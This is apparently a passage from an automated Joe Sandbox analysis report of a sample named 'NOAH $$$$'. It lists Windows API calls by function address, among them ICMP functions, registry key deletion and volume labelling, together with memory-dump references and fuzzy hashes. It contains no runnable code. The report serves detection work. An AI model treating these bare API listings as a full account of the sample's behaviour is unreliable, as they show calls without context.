                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                        • String ID: crts
                                                                                                                                        • API String ID: 943502515-3724388283
                                                                                                                                        • Opcode ID: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                        • Opcode Fuzzy Hash: 6bd881ada2ae8ff0a5326c51e5497572252972d1a55ad2f97464bff4f718433f
                                                                                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$LabelVolume
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 2006950084-234962358
                                                                                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                        • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 772068139-4108050209
                                                                                                                                        • Opcode ID: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                                                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                        • Opcode Fuzzy Hash: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                                                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$_wcscpy
                                                                                                                                        • String ID: 3, 3, 8, 1
                                                                                                                                        • API String ID: 3469035223-357260408
                                                                                                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                        • API String ID: 2574300362-3530519716
                                                                                                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                        • API String ID: 2574300362-275556492
                                                                                                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                        • API String ID: 2574300362-58917771
                                                                                                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                                        • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                        • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                                                                                                                        • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                                                                                                                        • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                                                                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                                                                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2808897238-0
                                                                                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                        • __itow.LIBCMT ref: 004699CD
                                                                                                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                        • __itow.LIBCMT ref: 00469A97
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
